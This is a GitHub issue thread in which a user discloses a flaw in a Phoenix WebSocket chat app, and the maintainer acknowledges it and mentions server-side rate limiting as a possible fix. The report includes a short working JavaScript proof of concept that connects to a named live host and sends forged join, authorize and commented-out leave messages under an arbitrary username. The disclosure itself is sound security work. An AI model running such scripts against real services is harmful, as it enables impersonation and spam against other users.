### ISSUE TITLE
hey i dont know if this is you guys but websockets can do some funky things

### ISSUE THREAD

**Issue by piedoom** [datafruits/datafruits#13]
but like websockets have no way to prevent doing bad things

```
var msg = {"topic":"phoenix","event":"heartbeat","payload":{},"ref":"19"};
var join = {"topic":"rooms:lobby","event":"phx_join","payload":{},"ref":"1"};
var auth = {"topic":"rooms:lobby","event":"authorize","payload":{"user":"Dakot","timestamp":1469154742270},"ref":"2"};
 
// var leave = {"topic":"rooms:lobby","ref":null,"payload":{"user":"12"},"event":"user:left"};
 
 
 
 
function sendStuff(){
 
  ws.send(JSON.stringify(join));
 
  ws.send(JSON.stringify(auth));
 
  // ws.send(JSON.stringify(leave));
 
  ws.send(JSON.stringify(msg));
 
}
 
var ws = new WebSocket("ws://hotdog-lounge.herokuapp.com/socket/websocket?user_id=123");
ws.onopen = sendStuff;
```

you can just kinda like spam chat messages and make users leave when they actually haven't, etc.

Does this count as responsible disclosure?

(tested in chrome 53 on win10)

**Comment by mcfiredrill** [comment]
Hey! Thanks for reporting this. 
I did know about this actually, but thanks for reminding me.

I'm not really sure how to solve this other than maybe doing something on the server side like rate limiting, etc. If you are interested in looking at the server code it actually lives in another repo:
https://github.com/datafruits/hotdog_lounge
